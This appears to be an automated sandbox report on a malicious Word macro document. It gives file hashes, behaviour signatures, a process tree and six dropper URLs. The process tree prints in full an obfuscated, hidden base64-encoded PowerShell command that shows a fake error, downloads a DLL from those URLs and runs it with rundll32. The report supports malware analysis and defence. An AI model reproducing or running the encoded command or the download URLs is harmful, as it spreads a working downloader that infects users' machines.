Analysis

  • max time kernel
    69s
  • max time network
    143s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    13-01-2021 02:15

General

  • Target

    SecuriteInfo.com.Mal.DocDl-K.8726.24378.doc

  • Size

    103KB

  • MD5

    63d050a0b73b0ffc079150296c073cab

  • SHA1

    b5b302ceeac09ba16da146138dc3134f363affef

  • SHA256

    206e8bdc5d69ceabd4d65a60efd5e6bdd03258acf0e528abd997fbb3cc948737

  • SHA512

    08836049f1794c5bd39ee4325de78c245411ce9c582c451e0b684791ab4a968b62e7da46efa28de8e87dcd2cb49ff5c2af9d3d58e8f77b6dc48b94aedc3d6862

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://angel2gether.de/BlutEngel/SpeechEngines/

exe.dropper

http://holonchile.cl/cgi-bin/System32/

exe.dropper

http://members.nlbformula.com/cgi-bin/Microsoft.NET/

exe.dropper

http://akybron.hu/wordpress/Triedit/

exe.dropper

https://norailya.com/drupal/4zKMm/

exe.dropper

http://giannaspsychicstudio.com/cgi-bin/Systems/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • Loads dropped DLL 4 IoCs
  • Drops file in System32 directory 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 23 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Mal.DocDl-K.8726.24378.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:1068
  • C:\Windows\system32\cmd.exe
    cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgACQAbAB1AE4AOQBjAFgAPQBbAHQAWQBwAGUAXQAoACIAewAyAH0AewAwAH0AewAzAH0AewA0AH0AewAxAH0AIgAgAC0ARgAnAEUATQAuAEkATwAnACwAJwB5ACcALAAnAFMAWQBzAFQAJwAsACcALgBEAEkAcgBFAEMAVAAnACwAJwBPAHIAJwApACAAOwAgACAAUwBlAHQAIAAgACgAJwBMADQAYQAnACsAJwBIACcAKQAgACgAWwBUAHkAUABlAF0AKAAiAHsANgB9AHsAMgB9AHsAMAB9AHsANAB9AHsAMQB9AHsANwB9AHsANQB9AHsAMwB9ACIAIAAtAGYAJwBFACcALAAnAEUAdAAuAFMARQByAFYAaQBjAGUAcAAnACwAJwBUACcALAAnAGUAUgAnACwAJwBtAC4AbgAnACwAJwBBAE4AYQBnACcALAAnAFMAeQBTACcALAAnAG8AaQBuAHQAbQAnACkAIAAgACkAIAA7ACAAJABEAHAAXwBqAG0AYgB0AD0AJABFADcAOABMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABJADAANQBRADsAJABYADUANQBOAD0AKAAnAFEANAAnACsAJwA4AEsAJwApADsAIAAgACQATAB1AE4AOQBDAFgAOgA6ACIAYwBSAGAAZQBhAFQAYABFAGQASQBSAGAARQBgAGMAdABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAAnACsAJwB9ACcAKwAnAEwAJwArACcAbQBsADMAeABiAG4AewAwACcAKwAnAH0AVQA2AGgAdwAnACsAKAAnAGcAbAAnACsAJwBuACcAKQArACcAewAwAH0AJwApAC0AZgBbAEMAaABhAHIAXQA5ADIAKQApADsAJABDADUANQBXAD0AKAAoACcATAA4ACcAKwAnADUAJwApACsAJwBXACcAKQA7ACAAKABnAEUAVAAtAFYAYQByAEkAYQBiAEwARQAgACAAKAAnAGwANABhACcAKwAnAEgAJwApACAAIAAtAFYAYQBMAFUARQBvAG4AKQA6ADoAIgBTAGUAYwBgAFUAcgBpAHQAWQBgAHAAcgBvAHQAYABPAGMAbwBsACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABKADAAMQBNAD0AKAAnAFMANAAnACsAJwAxAEYAJwApADsAJABYADYAbABzAGkAYgBiACAAPQAgACgAJwBMAF8AJwArACcAMgBGACcAKQA7ACQAWAA1ADQAUAA9ACgAJwBHADYAJwArACcAXwBZACcAKQA7ACQAUgA3ADIANQAzAG8AZQA9ACQASABPAE0ARQArACgAKAAnAHsAMAB9AEwAJwArACgAJwBtACcAKwAnAGwAMwB4AGIAJwArACcAbgAnACkAKwAnAHsAMAAnACsAJwB9AFUANgBoAHcAZwBsACcAKwAnAG4AJwArACcAewAnACsAJwAwACcAKwAnAH0AJwApACAAIAAtAEYAIAAgAFsAQwBoAEEAcgBdADkAMgApACsAJABYADYAbABzAGkAYgBiACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABWADMAOQBZAD0AKAAnAFEANgAnACsAJwA2AEUAJwApADsAJABYAGwAdwB2AGwAaAA2AD0AKAAnAHcAJwArACcAXQAnACsAKAAnAHgAbQBbACcAKwAnAHYAOgAnACkAKwAoACcALwAvACcAKwAnAGEAJwApACsAKAAnAG4AZwAnACsAJwBlAGwAMgBnACcAKQArACgAJwBlAHQAJwArACcAaAAnACkAKwAnAGUAcgAnACsAKAAnAC4AZAAnACsAJwBlAC8AQgBsACcAKQArACcAdQB0ACcAKwAnAEUAJwArACgAJwBuAGcAZQAnACsAJwBsACcAKQArACgAJwAvAFMAcABlAGUAJwArACcAYwBoAEUAJwArACcAbgAnACkAKwAoACcAZwBpAG4AZQBzACcAKwAnAC8AQAAnACsAJwB3AF0AeABtAFsAdgA6ACcAKQArACcALwAnACsAKAAnAC8AaABvAGwAJwArACcAbwBuACcAKQArACcAYwAnACsAKAAnAGgAJwArACcAaQAnACsAJwBsAGUALgAnACsAJwBjAGwALwBjAGcAJwArACcAaQAtAGIAJwArACcAaQBuAC8AUwB5ACcAKQArACgAJwBzAHQAJwArACcAZQBtACcAKQArACgAJwAzADIAJwArACcALwBAAHcAJwApACsAKAAnAF0AJwArACcAeABtACcAKQArACgAJwBbACcAKwAnAHYAOgAnACkAKwAnAC8AJwArACcALwAnACsAKAAnAG0AZQBtAGIAZQAnACsAJwByACcAKQArACgAJwBzAC4AJwArACcAbgAnACkAKwAoACcAbABiAGYAbwAnACsAJwByAG0AdQBsACcAKwAnAGEALgBjAG8AbQAvAGMAJwArACcAZwAnACkAKwAoACcAaQAnACsAJwAtAGIAJwApACsAKAAnAGkAbgAvACcAKwAnAE0AJwApACsAKAAnAGkAYwByAG8AcwAnACsAJwBvACcAKQArACcAZgB0ACcAKwAnAC4AJwArACgAJwBOAEUAVAAnACsAJwAvACcAKwAnAEAAdwAnACkAKwAnAF0AJwArACcAeAAnACsAKAAnAG0AJwArACcAWwB2ACcAKQArACgAJwA6ACcAKwAnAC8ALwAnACkAKwAoACcAYQBrACcAKwAnAHkAJwApACsAKAAnAGIAcgAnACsAJwBvAG4AJwApACsAJwAuACcAKwAnAGgAdQAnACsAKAAnAC8AdwAnACsAJwBvACcAKQArACgAJwByACcAKwAnAGQAcAByACcAKwAnAGUAcwBzACcAKwAnAC8AVAByAGkAZQBkAGkAJwApACsAKAAnAHQALwAnACsAJwBAACcAKQArACcAdwAnACsAKAAnAF0AJwArACcAeABtAFsAdgAnACsAJwBzACcAKQArACgAJwA6ACcAKwAnAC8ALwBuAG8AcgAnACsAJwBhAGkAbAAnACkAKwAoACcAeQAnACsAJwBhAC4AYwAnACkAKwAnAG8AJwArACgAJwBtACcAKwAnAC8AZAAnACsAJwByACcAKwAnAHUAcAAnACsAJwBhAGwAJwArACcALwA0AHoASwBNAG0ALwBAAHcAXQAnACsAJwB4AG0AJwApACsAKAAnAFsAJwArACcAdgAnACsAJwA6AC8ALwBnAGkAYQAnACsAJwBuAG4AYQBzACcAKQArACcAcABzACcAKwAnAHkAYwAnACsAKAAnAGgAaQAnACsAJwBjACcAKQArACgAJwBzAHQAJwArACcAdQAnACkAKwAoACcAZAAnACsAJwBpAG8AJwApACsAJwAuACcAKwAnAGMAbwAnACsAJwBtAC8AJwArACgAJwBjACcAKwAnAGcAaQAtAGIAaQAnACkAKwAoACcAbgAvACcAKwAnAFMAeQAnACkAKwAnAHMAdAAnACsAJwBlAG0AJwArACcAcwAnACsAJwAvACcAKQAuACIAUgBFAGAAcABMAGEAYABDAGUAIgAoACgAJwB3ACcAKwAoACcAXQAnACsAJwB4AG0AWwAnACkAKwAnAHYAJwApACwAKABbAGEAcgByAGEAeQBdACgAKAAnAGQAJwArACgAJwBzAGUAJwArACcAdwBmACcAKQApACwAKAAoACcAdwBlACcAKwAnAHYAJwApACsAJwB3AGUAJwApACkALAAoACgAJwBhAGUAJwArACcAZgAnACkAKwAnAGYAJwApACwAKAAnAGgAdAAnACsAJwB0AHAAJwApACkAWwAyAF0AKQAuACIAcwBQAEwAYABJAHQAIgAoACQAQwA1AF8ATAAgACsAIAAkAEQAcABfAGoAbQBiAHQAIAArACAAJABIADQANQBJACkAOwAkAEUAMwAyAFQAPQAoACcAQQA1ACcAKwAnADkASAAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEwAegBfAGMANgBwADIAIABpAG4AIAAkAFgAbAB3AHYAbABoADYAKQB7AHQAcgB5AHsAKAAmACgAJwBOACcAKwAnAGUAdwAnACsAJwAtAE8AYgBqAGUAJwArACcAYwB0ACcAKQAgAFMAWQBTAFQARQBtAC4AbgBFAFQALgBXAEUAQgBDAEwASQBFAG4AVAApAC4AIgBkAGAATwB3AGAATgBsAG8AQQBkAGAARgBpAGwAZQAiACgAJABMAHoAXwBjADYAcAAyACwAIAAkAFIANwAyADUAMwBvAGUAKQA7ACQAVwAwADIAQgA9ACgAKAAnAE0ANgAnACsAJwAyACcAKQArACcAVQAnACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQAJwArACcALQBJAHQAZQBtACcAKQAgACQAUgA3ADIANQAzAG8AZQApAC4AIgBMAGAAZQBOAGAAZwBUAGgAIgAgAC0AZwBlACAAMwA5ADAANwAyACkAIAB7ACYAKAAnAHIAdQBuACcAKwAnAGQAbABsADMAMgAnACkAIAAkAFIANwAyADUAMwBvAGUALAAoACcAUwAnACsAKAAnAGgAJwArACcAbwB3ACcAKQArACcARABpACcAKwAoACcAYQAnACsAJwBsAG8AZwBBACcAKQApAC4AIgBUAG8AcwB0AFIAYABJAGAATgBHACIAKAApADsAJABLAF8AMgBBAD0AKAAnAEwAMAAnACsAJwAxAEgAJwApADsAYgByAGUAYQBrADsAJABDADcAXwBHAD0AKAAoACcAQgAnACsAJwAxADQAJwApACsAJwBMACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUwAzADEARgA9ACgAJwBJAF8AJwArACcAMgBDACcAKQA=
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:1656
    • C:\Windows\system32\msg.exe
      msg Admin /v Word experienced an error trying to open the file.
      2⤵
        PID:2004
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -w hidden -enc IAAgACQAbAB1AE4AOQBjAFgAPQBbAHQAWQBwAGUAXQAoACIAewAyAH0AewAwAH0AewAzAH0AewA0AH0AewAxAH0AIgAgAC0ARgAnAEUATQAuAEkATwAnACwAJwB5ACcALAAnAFMAWQBzAFQAJwAsACcALgBEAEkAcgBFAEMAVAAnACwAJwBPAHIAJwApACAAOwAgACAAUwBlAHQAIAAgACgAJwBMADQAYQAnACsAJwBIACcAKQAgACgAWwBUAHkAUABlAF0AKAAiAHsANgB9AHsAMgB9AHsAMAB9AHsANAB9AHsAMQB9AHsANwB9AHsANQB9AHsAMwB9ACIAIAAtAGYAJwBFACcALAAnAEUAdAAuAFMARQByAFYAaQBjAGUAcAAnACwAJwBUACcALAAnAGUAUgAnACwAJwBtAC4AbgAnACwAJwBBAE4AYQBnACcALAAnAFMAeQBTACcALAAnAG8AaQBuAHQAbQAnACkAIAAgACkAIAA7ACAAJABEAHAAXwBqAG0AYgB0AD0AJABFADcAOABMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABJADAANQBRADsAJABYADUANQBOAD0AKAAnAFEANAAnACsAJwA4AEsAJwApADsAIAAgACQATAB1AE4AOQBDAFgAOgA6ACIAYwBSAGAAZQBhAFQAYABFAGQASQBSAGAARQBgAGMAdABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAAnACsAJwB9ACcAKwAnAEwAJwArACcAbQBsADMAeABiAG4AewAwACcAKwAnAH0AVQA2AGgAdwAnACsAKAAnAGcAbAAnACsAJwBuACcAKQArACcAewAwAH0AJwApAC0AZgBbAEMAaABhAHIAXQA5ADIAKQApADsAJABDADUANQBXAD0AKAAoACcATAA4ACcAKwAnADUAJwApACsAJwBXACcAKQA7ACAAKABnAEUAVAAtAFYAYQByAEkAYQBiAEwARQAgACAAKAAnAGwANABhACcAKwAnAEgAJwApACAAIAAtAFYAYQBMAFUARQBvAG4AKQA6ADoAIgBTAGUAYwBgAFUAcgBpAHQAWQBgAHAAcgBvAHQAYABPAGMAbwBsACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABKADAAMQBNAD0AKAAnAFMANAAnACsAJwAxAEYAJwApADsAJABYADYAbABzAGkAYgBiACAAPQAgACgAJwBMAF8AJwArACcAMgBGACcAKQA7ACQAWAA1ADQAUAA9ACgAJwBHADYAJwArACcAXwBZACcAKQA7ACQAUgA3ADIANQAzAG8AZQA9ACQASABPAE0ARQArACgAKAAnAHsAMAB9AEwAJwArACgAJwBtACcAKwAnAGwAMwB4AGIAJwArACcAbgAnACkAKwAnAHsAMAAnACsAJwB9AFUANgBoAHcAZwBsACcAKwAnAG4AJwArACcAewAnACsAJwAwACcAKwAnAH0AJwApACAAIAAtAEYAIAAgAFsAQwBoAEEAcgBdADkAMgApACsAJABYADYAbABzAGkAYgBiACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABWADMAOQBZAD0AKAAnAFEANgAnACsAJwA2AEUAJwApADsAJABYAGwAdwB2AGwAaAA2AD0AKAAnAHcAJwArACcAXQAnACsAKAAnAHgAbQBbACcAKwAnAHYAOgAnACkAKwAoACcALwAvACcAKwAnAGEAJwApACsAKAAnAG4AZwAnACsAJwBlAGwAMgBnACcAKQArACgAJwBlAHQAJwArACcAaAAnACkAKwAnAGUAcgAnACsAKAAnAC4AZAAnACsAJwBlAC8AQgBsACcAKQArACcAdQB0ACcAKwAnAEUAJwArACgAJwBuAGcAZQAnACsAJwBsACcAKQArACgAJwAvAFMAcABlAGUAJwArACcAYwBoAEUAJwArACcAbgAnACkAKwAoACcAZwBpAG4AZQBzACcAKwAnAC8AQAAnACsAJwB3AF0AeABtAFsAdgA6ACcAKQArACcALwAnACsAKAAnAC8AaABvAGwAJwArACcAbwBuACcAKQArACcAYwAnACsAKAAnAGgAJwArACcAaQAnACsAJwBsAGUALgAnACsAJwBjAGwALwBjAGcAJwArACcAaQAtAGIAJwArACcAaQBuAC8AUwB5ACcAKQArACgAJwBzAHQAJwArACcAZQBtACcAKQArACgAJwAzADIAJwArACcALwBAAHcAJwApACsAKAAnAF0AJwArACcAeABtACcAKQArACgAJwBbACcAKwAnAHYAOgAnACkAKwAnAC8AJwArACcALwAnACsAKAAnAG0AZQBtAGIAZQAnACsAJwByACcAKQArACgAJwBzAC4AJwArACcAbgAnACkAKwAoACcAbABiAGYAbwAnACsAJwByAG0AdQBsACcAKwAnAGEALgBjAG8AbQAvAGMAJwArACcAZwAnACkAKwAoACcAaQAnACsAJwAtAGIAJwApACsAKAAnAGkAbgAvACcAKwAnAE0AJwApACsAKAAnAGkAYwByAG8AcwAnACsAJwBvACcAKQArACcAZgB0ACcAKwAnAC4AJwArACgAJwBOAEUAVAAnACsAJwAvACcAKwAnAEAAdwAnACkAKwAnAF0AJwArACcAeAAnACsAKAAnAG0AJwArACcAWwB2ACcAKQArACgAJwA6ACcAKwAnAC8ALwAnACkAKwAoACcAYQBrACcAKwAnAHkAJwApACsAKAAnAGIAcgAnACsAJwBvAG4AJwApACsAJwAuACcAKwAnAGgAdQAnACsAKAAnAC8AdwAnACsAJwBvACcAKQArACgAJwByACcAKwAnAGQAcAByACcAKwAnAGUAcwBzACcAKwAnAC8AVAByAGkAZQBkAGkAJwApACsAKAAnAHQALwAnACsAJwBAACcAKQArACcAdwAnACsAKAAnAF0AJwArACcAeABtAFsAdgAnACsAJwBzACcAKQArACgAJwA6ACcAKwAnAC8ALwBuAG8AcgAnACsAJwBhAGkAbAAnACkAKwAoACcAeQAnACsAJwBhAC4AYwAnACkAKwAnAG8AJwArACgAJwBtACcAKwAnAC8AZAAnACsAJwByACcAKwAnAHUAcAAnACsAJwBhAGwAJwArACcALwA0AHoASwBNAG0ALwBAAHcAXQAnACsAJwB4AG0AJwApACsAKAAnAFsAJwArACcAdgAnACsAJwA6AC8ALwBnAGkAYQAnACsAJwBuAG4AYQBzACcAKQArACcAcABzACcAKwAnAHkAYwAnACsAKAAnAGgAaQAnACsAJwBjACcAKQArACgAJwBzAHQAJwArACcAdQAnACkAKwAoACcAZAAnACsAJwBpAG8AJwApACsAJwAuACcAKwAnAGMAbwAnACsAJwBtAC8AJwArACgAJwBjACcAKwAnAGcAaQAtAGIAaQAnACkAKwAoACcAbgAvACcAKwAnAFMAeQAnACkAKwAnAHMAdAAnACsAJwBlAG0AJwArACcAcwAnACsAJwAvACcAKQAuACIAUgBFAGAAcABMAGEAYABDAGUAIgAoACgAJwB3ACcAKwAoACcAXQAnACsAJwB4AG0AWwAnACkAKwAnAHYAJwApACwAKABbAGEAcgByAGEAeQBdACgAKAAnAGQAJwArACgAJwBzAGUAJwArACcAdwBmACcAKQApACwAKAAoACcAdwBlACcAKwAnAHYAJwApACsAJwB3AGUAJwApACkALAAoACgAJwBhAGUAJwArACcAZgAnACkAKwAnAGYAJwApACwAKAAnAGgAdAAnACsAJwB0AHAAJwApACkAWwAyAF0AKQAuACIAcwBQAEwAYABJAHQAIgAoACQAQwA1AF8ATAAgACsAIAAkAEQAcABfAGoAbQBiAHQAIAArACAAJABIADQANQBJACkAOwAkAEUAMwAyAFQAPQAoACcAQQA1ACcAKwAnADkASAAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEwAegBfAGMANgBwADIAIABpAG4AIAAkAFgAbAB3AHYAbABoADYAKQB7AHQAcgB5AHsAKAAmACgAJwBOACcAKwAnAGUAdwAnACsAJwAtAE8AYgBqAGUAJwArACcAYwB0ACcAKQAgAFMAWQBTAFQARQBtAC4AbgBFAFQALgBXAEUAQgBDAEwASQBFAG4AVAApAC4AIgBkAGAATwB3AGAATgBsAG8AQQBkAGAARgBpAGwAZQAiACgAJABMAHoAXwBjADYAcAAyACwAIAAkAFIANwAyADUAMwBvAGUAKQA7ACQAVwAwADIAQgA9ACgAKAAnAE0ANgAnACsAJwAyACcAKQArACcAVQAnACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQAJwArACcALQBJAHQAZQBtACcAKQAgACQAUgA3ADIANQAzAG8AZQApAC4AIgBMAGAAZQBOAGAAZwBUAGgAIgAgAC0AZwBlACAAMwA5ADAANwAyACkAIAB7ACYAKAAnAHIAdQBuACcAKwAnAGQAbABsADMAMgAnACkAIAAkAFIANwAyADUAMwBvAGUALAAoACcAUwAnACsAKAAnAGgAJwArACcAbwB3ACcAKQArACcARABpACcAKwAoACcAYQAnACsAJwBsAG8AZwBBACcAKQApAC4AIgBUAG8AcwB0AFIAYABJAGAATgBHACIAKAApADsAJABLAF8AMgBBAD0AKAAnAEwAMAAnACsAJwAxAEgAJwApADsAYgByAGUAYQBrADsAJABDADcAXwBHAD0AKAAoACcAQgAnACsAJwAxADQAJwApACsAJwBMACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUwAzADEARgA9ACgAJwBJAF8AJwArACcAMgBDACcAKQA=
        2⤵
        • Blocklisted process makes network request
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:760
        • C:\Windows\system32\rundll32.exe
          "C:\Windows\system32\rundll32.exe" C:\Users\Admin\Lml3xbn\U6hwgln\L_2F.dll ShowDialogA
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1924
          • C:\Windows\SysWOW64\rundll32.exe
            "C:\Windows\system32\rundll32.exe" C:\Users\Admin\Lml3xbn\U6hwgln\L_2F.dll ShowDialogA
            4⤵
            • Loads dropped DLL
            • Drops file in System32 directory
            • Suspicious use of WriteProcessMemory
            PID:1740
            • C:\Windows\SysWOW64\rundll32.exe
              C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Hamcdhhpclbtwlkt\xfydgieniyqkjpg.axx",ShowDialogA
              5⤵
              • Blocklisted process makes network request
              • Suspicious behavior: EnumeratesProcesses
              PID:1576

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\Lml3xbn\U6hwgln\L_2F.dll

      MD5

      238a0e860a00ea4cc8ee2af05f2fbddf

      SHA1

      9df6ff60eab437a31d0a2117d25663ca6a2f7b73

      SHA256

      8d750274a3d5721322603b3bb296cc039990b91a9bd2776ed662e0cf70335c24

      SHA512

      c6a3156ff5efe5fc53962fd1e0e1f1f561a729569656b4e590032ac53d7b0c7c719859e203cfe2d2b39fc29267132c1f6557272243e5c2aaec7a556dadd38210

    • \Users\Admin\Lml3xbn\U6hwgln\L_2F.dll

      MD5

      238a0e860a00ea4cc8ee2af05f2fbddf

      SHA1

      9df6ff60eab437a31d0a2117d25663ca6a2f7b73

      SHA256

      8d750274a3d5721322603b3bb296cc039990b91a9bd2776ed662e0cf70335c24

      SHA512

      c6a3156ff5efe5fc53962fd1e0e1f1f561a729569656b4e590032ac53d7b0c7c719859e203cfe2d2b39fc29267132c1f6557272243e5c2aaec7a556dadd38210

    • \Users\Admin\Lml3xbn\U6hwgln\L_2F.dll

      MD5

      238a0e860a00ea4cc8ee2af05f2fbddf

      SHA1

      9df6ff60eab437a31d0a2117d25663ca6a2f7b73

      SHA256

      8d750274a3d5721322603b3bb296cc039990b91a9bd2776ed662e0cf70335c24

      SHA512

      c6a3156ff5efe5fc53962fd1e0e1f1f561a729569656b4e590032ac53d7b0c7c719859e203cfe2d2b39fc29267132c1f6557272243e5c2aaec7a556dadd38210

    • \Users\Admin\Lml3xbn\U6hwgln\L_2F.dll

      MD5

      238a0e860a00ea4cc8ee2af05f2fbddf

      SHA1

      9df6ff60eab437a31d0a2117d25663ca6a2f7b73

      SHA256

      8d750274a3d5721322603b3bb296cc039990b91a9bd2776ed662e0cf70335c24

      SHA512

      c6a3156ff5efe5fc53962fd1e0e1f1f561a729569656b4e590032ac53d7b0c7c719859e203cfe2d2b39fc29267132c1f6557272243e5c2aaec7a556dadd38210

    • \Users\Admin\Lml3xbn\U6hwgln\L_2F.dll

      MD5

      238a0e860a00ea4cc8ee2af05f2fbddf

      SHA1

      9df6ff60eab437a31d0a2117d25663ca6a2f7b73

      SHA256

      8d750274a3d5721322603b3bb296cc039990b91a9bd2776ed662e0cf70335c24

      SHA512

      c6a3156ff5efe5fc53962fd1e0e1f1f561a729569656b4e590032ac53d7b0c7c719859e203cfe2d2b39fc29267132c1f6557272243e5c2aaec7a556dadd38210

    • memory/268-19-0x000007FEF7E60000-0x000007FEF80DA000-memory.dmp

      Filesize

      2.5MB

    • memory/760-6-0x000000001AB00000-0x000000001AB01000-memory.dmp

      Filesize

      4KB

    • memory/760-9-0x000000001C3E0000-0x000000001C3E1000-memory.dmp

      Filesize

      4KB

    • memory/760-10-0x000000001C7F0000-0x000000001C7F1000-memory.dmp

      Filesize

      4KB

    • memory/760-8-0x00000000025E0000-0x00000000025E1000-memory.dmp

      Filesize

      4KB

    • memory/760-7-0x0000000002440000-0x0000000002441000-memory.dmp

      Filesize

      4KB

    • memory/760-5-0x0000000002380000-0x0000000002381000-memory.dmp

      Filesize

      4KB

    • memory/760-4-0x000007FEF5C30000-0x000007FEF661C000-memory.dmp

      Filesize

      9.9MB

    • memory/760-3-0x0000000000000000-mapping.dmp

    • memory/1576-18-0x0000000000000000-mapping.dmp

    • memory/1740-13-0x0000000000000000-mapping.dmp

    • memory/1924-11-0x0000000000000000-mapping.dmp

    • memory/2004-2-0x0000000000000000-mapping.dmp